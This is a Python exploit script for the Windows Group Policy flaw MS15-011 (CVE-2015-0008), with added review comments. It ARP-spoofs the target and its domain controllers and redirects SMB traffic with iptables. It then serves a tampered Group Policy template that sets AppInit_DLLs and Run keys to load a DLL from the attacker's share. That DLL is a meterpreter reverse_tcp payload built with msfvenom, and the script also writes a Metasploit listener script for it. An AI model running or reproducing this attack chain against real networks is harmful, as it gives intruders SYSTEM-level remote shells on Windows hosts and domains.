# Exploit Title: Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution
# Date: 2019-10-28
# Exploit Author: Thomas Zuk
# Version: Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012,
# Windows RT, Windows 8.1, Windows Server 2012 R2, and Windows RT 8.1
# Tested on: Windows 7 , Windows Server 2012
# CVE : CVE-2015-0008
# Type: Remote
# Platform: Windows
# Description: While multiple advisories for the vulnerability and video demos of
# successful exploitation exist, there is no public exploit code for MS15-011 (CVE-2015-0008). This exploit code
# targets vulnerable systems in order to modify registry keys to disable SMB signing, achieve SYSTEM level
# remote code execution (AppInit_DLL) and a user level remote code execution (Run Keys).
#!/usr/bin/python3
import argparse
import os
import subprocess
import socket
import fcntl
import struct
# MS15-011 Exploit.
# For more information and any updates/additions to this exploit, see the following Git repo: https://github.com/Freakazoidile/Exploit_Dev/tree/master/MS15-011
# Example usage: python3 ms15-011.py -t 172.66.10.2 -d 172.66.10.10 -i eth1
# Example usage with multiple DC's: python3 ms15-011.py -t 172.66.10.2 -d 172.66.10.10 -d 172.66.10.11 -d 172.66.10.12 -i eth1
# Questions: @Freakazoidile on Twitter, or open an issue on the GitHub repo. Enjoy.
def arpSpoof(interface, hostIP, targetIP):
    """Spawn an ``arpspoof`` child process on ``interface``.

    The command line is ``arpspoof -i <interface> <hostIP> <targetIP>``,
    split on whitespace before spawning, so ``targetIP`` may carry extra
    ``-t ...`` tokens (the main block passes them that way).

    Args:
        interface: interface name handed to ``arpspoof -i``.
        hostIP: first positional argument passed to ``arpspoof``.
        targetIP: remaining argument text; split on whitespace.

    Returns:
        None. The ``Popen`` handle is dropped, so the child keeps running
        in the background and is neither waited on nor terminated here.
    """
    arpCmd = "arpspoof -i %s %s %s " % (interface, hostIP, targetIP)
    # str.split() with no separator collapses runs of whitespace, so the
    # trailing space in arpCmd does not become an empty argument.
    arpArgs = arpCmd.split()
    print("Arpspoofing: %s" % (arpArgs))
    # NOTE(review): stdout is a PIPE that is never read and the handle p is
    # not retained; a child that fills the pipe buffer will block on write.
    p = subprocess.Popen(arpArgs, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)


def karmaSMB(hostIP):
    """Prepare the Group Policy template files and run the karmaSMB server.

    Steps, in order:
      1. Restore ``GptTmpl.inf`` from ``GptTmpl.inf.bak`` with ``cp``
         (exit status ignored; fails silently if the backup is absent).
      2. Append two registry lines (an ``AppInit_DLLs`` entry and a ``Run``
         key entry, both referencing ``share.dll`` on the SYSVOL share of
         ``hostIP``) to ``GptTmpl.inf`` as UTF-16LE text with CRLF endings.
      3. Write ``smb.conf`` mapping ``ini``/``inf``/``dll`` to files in the
         current working directory.
      4. Run ``python karmaSMB.py -config smb.conf -smb2support ./`` via
         ``os.system``, which blocks until the server process exits.

    Args:
        hostIP: address substituted into the UNC paths of both lines.

    Returns:
        None.
    """
    print("reverting GptTmpl.inf from bak")
    os.system("cp GptTmpl.inf.bak GptTmpl.inf")
    appInit = 'MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs=1,"\\\\%s\\SYSVOL\\share.dll"\r\n' % (hostIP)
    CURunKey = 'MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Key=1,"rundll32.exe \\\\%s\\SYSVOL\\share.dll",1\r\n' % (hostIP)
    # Append mode: the restored template is kept and the two lines are added
    # at the end. The "utf-16le" codec writes no BOM; the existing file is
    # assumed to already be UTF-16LE -- TODO confirm against the .bak file.
    f = open("GptTmpl.inf","a", encoding='utf-16le')
    f.write(appInit)
    f.write(CURunKey)
    f.close()

    path = os.getcwd()

    # karmaSMB config: absolute paths are built from the current directory,
    # so the script must be run from the directory holding these files.
    fConfig = open("smb.conf","w")
    fConfig.write("ini = "+path+"/gpt.ini\ninf = "+path+"/GptTmpl.inf\ndll = "+path+"/shell.dll\n")
    fConfig.close()

    # Blocks here until karmaSMB.py exits.
    karmaCmd = "python karmaSMB.py -config smb.conf -smb2support ./ "
    os.system(karmaCmd)


def iptables_config(targetIP, hostIP):
    """Enable IPv4 forwarding and add NAT rules redirecting SMB traffic.

    Every command is echoed with a ``[+]`` prefix and then run through
    ``os.system``; exit statuses are not checked. The rules are appended
    (``-A``) and nothing in this script removes them afterwards.
    Requires root (writes to ``/proc/sys`` and modifies iptables).

    Args:
        targetIP: source address matched by the two PREROUTING rules.
        hostIP: DNAT destination for TCP ports 445 and 139.

    Returns:
        None.
    """
    print('[+] Running command: echo "1" > /proc/sys/net/ipv4/ip_forward')
    print('[+] Running command: iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 445 -j DNAT --to-destination %s' % (targetIP, hostIP))
    print('[+] Running command: iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 139 -j DNAT --to-destination %s' % (targetIP, hostIP))
    print('[+] Running command: iptables -t nat -A POSTROUTING -j MASQUERADE')
    os.system('echo "1" > /proc/sys/net/ipv4/ip_forward')
    # Rewrite the destination of SMB (445) and NetBIOS session (139) traffic
    # coming from targetIP so it lands on hostIP.
    os.system('iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 445 -j DNAT --to-destination %s' % (targetIP, hostIP))
    os.system('iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 139 -j DNAT --to-destination %s' % (targetIP, hostIP))
    os.system('iptables -t nat -A POSTROUTING -j MASQUERADE')


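def get_interface_address(ifname):
    """Return the IPv4 address of the Linux interface ``ifname`` as a string.

    Issues the ``SIOCGIFADDR`` ioctl (0x8915) on a throwaway UDP socket and
    extracts the address bytes from the returned ``ifreq`` buffer. The name
    is truncated to 15 bytes so it fits the kernel's ``IFNAMSIZ - 1`` limit.

    Args:
        ifname: interface name, e.g. ``"eth0"``.

    Returns:
        Dotted-quad address string.

    Raises:
        OSError: if the interface does not exist or has no IPv4 address.
    """
    SIOCGIFADDR = 0x8915
    # The socket exists only to supply a file descriptor for the ioctl; the
    # original left it open, which leaked one descriptor per call.
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        ifreq = struct.pack('256s', bytes(ifname[:15], 'utf-8'))
        result = fcntl.ioctl(s.fileno(), SIOCGIFADDR, ifreq)
    # sin_addr sits at byte offset 20 of the returned ifreq structure.
    return socket.inet_ntoa(result[20:24])

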
def generatePayload(lhost, lport):
    """Build ``shell.dll`` with msfvenom and write ``meta_resource.rc``.

    Runs ``msfvenom`` (``windows/x64/meterpreter/reverse_tcp``, DLL output)
    through ``os.system`` and then writes a Metasploit resource script that
    starts a ``multi/handler`` for the same payload. Neither the msfvenom
    exit status nor the presence of ``shell.dll`` afterwards is checked.

    Args:
        lhost: listener address substituted into the payload and the script.
        lport: listener port, used the same way (a string in the main block).

    Returns:
        None.
    """
    print("generating payload(s) and metasploit resource file")
    msfDll = "msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=%s lport=%s -f dll -o shell.dll" % (lhost, lport)
    os.system(msfDll)
    msfResource = "use multi/handler\nset payload windows/x64/meterpreter/reverse_tcp\nset lhost %s\nset lport %s\nset exitonsession false\nexploit -j\n" % (lhost, lport)
    print("metasploit resource script: %s" % msfResource)
    print ("metasploit resource script written to meta_resource.rc type 'msfconsole -r meta_resource.rc' to launch metasploit and stage a listener automatically")

    # "w+" truncates any previous resource file before writing.
    file = open("meta_resource.rc", "w+")
    file.write(msfResource)
    file.close()


if __name__ == '__main__':
    # Entry point: parse arguments, fetch helper files if needed, start the
    # arpspoof processes, generate the payload, install NAT rules and finally
    # run the SMB server (which blocks until it exits).

    parser = argparse.ArgumentParser()

    # Add arguments
    parser.add_argument("-t", "--target_ip", help="The IP of the target machine vulnerable to ms15-011/14", required=True)
    # action='append' collects every -d occurrence into a list.
    parser.add_argument("-d", "--domain_controller", help="The IP of the domain controller(s) in the target domain. Use this argument multiple times when multiple domain contollers are preset.\nE.G: -d 172.66.10.10 -d 172.66.10.11", action='append', required=True)
    parser.add_argument("-i", "--interface", help="The interface to use. E.G eth0", required=True)
    parser.add_argument("-l", "--lhost", help="The IP to listen for incoming connections on for reverse shell. This is optional, uses the IP from the provided interface by default. E.G 192.168.5.1", required=False)
    parser.add_argument("-p", "--lport", help="The port to listen connections on for reverse shell. If not specified 4444 is used. E.G 443", required=False)

    args = parser.parse_args()

    # Check for KarmaSMB and GptTmpl.inf.bak, if missing download git repo with these files.
    # NOTE(review): the condition uses `and`, so the clone only happens when
    # BOTH files are absent; with exactly one missing nothing is fetched and a
    # later step fails (the cp in karmaSMB, or karmaSMB.py not found).
    print ("checking for missing file(s)")
    if not os.path.isfile("karmaSMB.py") and not os.path.isfile("GptTmpl.inf.bak"):
        print("Requirements missing. Downloading required files from github")
        os.system("git clone https://github.com/Freakazoidile/MS15-011-Files")
        os.system("mv MS15-011-Files/* . && rm -rf MS15-011-Files/")

    # Get the provided interfaces IP address
    ipAddr = get_interface_address(args.interface)

    # Listener address defaults to the interface address; port to '4444'.
    # lport stays a string throughout (it is only interpolated into text).
    if args.lhost is not None:
        lhost = args.lhost
    else:
        lhost = ipAddr

    if args.lport is not None:
        lport = args.lport
    else:
        lport = '4444'

    dcSpoof = ""
    dcCommaList = ""
    count = 0

    # loop over the domain controllers, poison each and target the host IP
    # create a comma separated list of DC's
    # create a "-t" separate list of DC's for use with arpspoof
    # NOTE(review): dcCommaList is built here but never read afterwards.
    for dc in args.domain_controller:
        dcSpoof += "-t %s " % (dc)
        if count > 0:
            dcCommaList += ",%s" % (dc)
        else:
            dcCommaList += "%s" % (dc)

        arpSpoof(args.interface, dc, "-t %s" % (args.target_ip))
        count += 1

    # arpspoof the target and all of the DC's
    arpSpoof(args.interface, args.target_ip, dcSpoof)

    # generate payloads
    generatePayload(lhost, lport)

    # Setup iptables forwarding rules
    iptables_config(args.target_ip, ipAddr)

    # run Karma SMB Server -- os.system inside blocks until it exits, so the
    # two prints below only appear after the server has stopped.
    karmaSMB(ipAddr)

    # NOTE(review): the argparse dest is "domain_controller" (singular), so
    # `args.domain_controllers` raises AttributeError here; dcCommaList looks
    # like the value that was meant to be printed.
    print("Targeting %s by arp spoofing %s and domain controllers: %s " % (args.target_ip, args.target_ip, args.domain_controllers))
    print("If you interupt/stop the exploit ensure you stop all instances of arpspoof and flush firewall rules!")